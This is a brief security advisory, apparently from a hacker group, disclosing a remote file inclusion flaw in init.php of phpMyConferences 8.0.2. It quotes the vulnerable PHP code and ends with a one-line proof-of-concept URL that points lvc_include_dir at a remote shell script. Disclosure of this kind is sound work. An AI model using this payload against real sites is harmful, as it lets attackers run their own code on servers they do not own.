#Aria-Security.net Advisory #Discovered by: The-0utl4w (O.u.t.l.a.w) #Outlaw@xxxxxxxxxxxxxxxxx #< www.Aria-security.net > #Special Thanx to my bestfriend: A.u.r.a #And Also: DrtRp - Sh3ll - T3rr0r1st - Sivl3R and all Aria-Security's Members #----------------------------------------------------------- #Software: phpMyConferences_8.0.2 #Attack method: Remote File Inclusion #Vuln. File : init.php #Code: // DATABASE BACKUP //include_once(ROOT_DIR_PATH."admin/administration/backup.php"); // Statistics $lvc_include_dir = ROOT_DIR_PATH."common/visiteurs/include/"; include_once($lvc_include_dir.'new-visitor.inc.php'); //Link to the database $db_link = @mysql_connect(SQL_SERVEUR,SQL_USER,SQL_PASSWD); if(!@mysql_connect(SQL_SERVEUR,SQL_USER,SQL_PASSWD)){ echo "La connexion a la base est impossible <br> Les informations fournies à l'installation ne permettent pas la connection à la base de données"; unlink(ROOT_DIR_PATH."/conf.php"); exit(); } #POC: http://site.com/{path}/init.php?lvc_include_dir=SHELL